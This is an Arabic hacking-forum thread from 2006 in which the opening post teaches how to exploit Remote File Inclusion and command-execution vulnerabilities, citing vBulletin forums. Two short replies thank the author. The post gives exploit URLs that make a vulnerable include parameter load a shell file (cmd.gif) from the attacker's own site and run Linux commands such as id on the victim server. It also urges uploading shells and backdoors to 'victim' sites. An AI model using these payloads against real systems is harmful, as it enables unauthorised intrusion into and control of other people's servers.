|
| |||||||
 |  | |
 |  |  |
 |
| | أدوات الموضوع | طريقة عرض الموضوع |
02-09-2006, 06:29 AM
| |||
| |||
 ( تعلم ثغرات ) Remote File Inclusion + commands execution بسم الله الرحمن الرحيم شباب اليوم موضوعنا عن الثغرات التي من نوع Remote File Inclusion commands execution وراح أشرح إستخدامها بالتفصيل إن شاء الله لأنها خطيره ورائعه وكثير من البرامج المشهوره لدينا أصيبت بمثلها مثل منتدى vBulletin وغيره بسم الله نبدأ : commands execution معناه تقدر تنفذ أوامر لينكس يعني إذا وجدة في بعض الثغرات أن نوعيتها commands execution فاعرف انك تستطيع عن طريق الثغرة تطبيق أوامر اللينكس وهذا شيء ممتاز يعني تقدر ترفع شل على الموقع اللي فيه الثغره أو ترفع باكدور أو اللي تبيه لأن الثغره تسمح لك بتنفيذ أوامر لينكس على السيرفر وطريقة إستعمال مثل هذه الثغرات سهل وكل اللي عليك هو وضع الأمر اللذي تريده الأن ناخذ الثغره تبع منتديات VB الجيل الثالث والي رابطها تحصله هناا شوف الإستغلال : كود: http://www.[victim].com/vb/include.php?test=http://attacker ومشروح بالموضوع كل شيء بالتفصيل وبالصور ===== Remote File Inclusion أيضاً تستطيع عن طريقها تطبيق أوامر اللينكس لكن لازم يكون عندك ملف مثل هذا cmd.gif وهو اللي يخليك تنفذ أوامر اللينكس على الموقع الضحيه وتكون رافعه على موقعك الشخصي الأن : لنفرض أنك وجدت في أحد مواقع الحماية ثغره ووجدت إستغلالها هكذا كود: http://www.[victim].com/vb/include.php?test=http://attacker http://www.(hacker).com/cmd.gif يعني سيصبح الرابط في المتصفح هكذا http://www.(hacker).com/vb/include.p...gif?&cmd=order لاحظ ماذا أضفنا ?&cmd=order مكان كلمة order تضع أوامر لينكس ولنفرض أنك تريد معرفة صلاحياتك على الموقع الضحية يعني أنك ستستخدم الأمر id لمعرفة الصلاحيات وهذا يعني أن الرابط سيصبح هكذا كود: http://www.(hacker).com/vb/include.php?test=http://www.(hacker).com/cmd.gif?&cmd=id والأن لنأخذ مثال أخر ونشرحه بالتفصيل كود: http://[victim]/page.php?test=http://attacker page.php الصفحه التي يوجد بها الثغره page.php?test الخطأ المسبب للثغره attacker وهو الموقع المهاجم وهو موقعك الذي سيكون عليه الملف cmd.gif وهذا يعني أن الرابط الذي سوف تستخدمه في الإختراق سوف يصبح هكذا كود: http://www.aaa.com/page.php?test=http://www.attaker.com/cmd.gif?&cmd=id والأن مو باقي عليك الا تعرف اوامر اللينكس وعملها وهذي تلقاها في نفس القسم ابحث تحصلها باذن الله وهذا موضوع فيه ثغره جديده من نوع Remote File Inclusion Remote File Inclusion هناااا ملاحظة : الملف cmd.gif مرفق والفرق بين Remote Command execution و Remote File Inclusion ان Remote File Inclusion فيها كود ترفعه على موقعك وتستخدم الاوامر مكان الاي دي((رابط موقعك مع الاي دي )) و Remote Command execution تستخدم اوامر اللينكس على طول بدون كود مرفوع (( الاي دي فقط )) تحياتي عذابي غير=zmani
_________________  |
|
02-09-2006, 02:04 PM
| ||||
| ||||
| يسلموووووووووو على الشرح
_________________  عزيزي العضو نرجو منك التبليغ عن أي مشاركة مخالفه بالضغط على هذه الصورة  وتجنب المخالفات  لتتجنب إيقاف عضويتك
|
|
02-10-2006, 12:33 PM
| |||
| |||
| مشكور اخوي على الشرح اخوكم\\وطواط
_________________ وطواط گـرهـتٍ المدرســہ وآلتدريــس ولأ عـآد لـے بالهكـرٍ خ ـآطرٍ  |
|
| مواقع النشر (المفضلة) |
| أدوات الموضوع | |
| طريقة عرض الموضوع | |
| |
المواضيع المتشابهه | ||||
| الموضوع | كاتب الموضوع | المنتدى | مشاركات | آخر رد |
| هل تعلم أن أول ما نفخ الروح في آدم عليه السلام؟ | abash | المنتدى الاسلامى | 15 | 07-20-2009 05:12 PM |
| هل تعلم ان المعلومات<<مفيدة | شهيد الرمش | منتدى الجريمه حوادث كوارث جرائم احداث عالميه وقضايا ساخنه الاتجاه المعاكس | 9 | 09-14-2005 03:01 AM |
| هل تعلم | زغلول بيه | المنتدى الاسلامى | 4 | 04-11-2003 03:16 PM |
-
-
العرض العادي
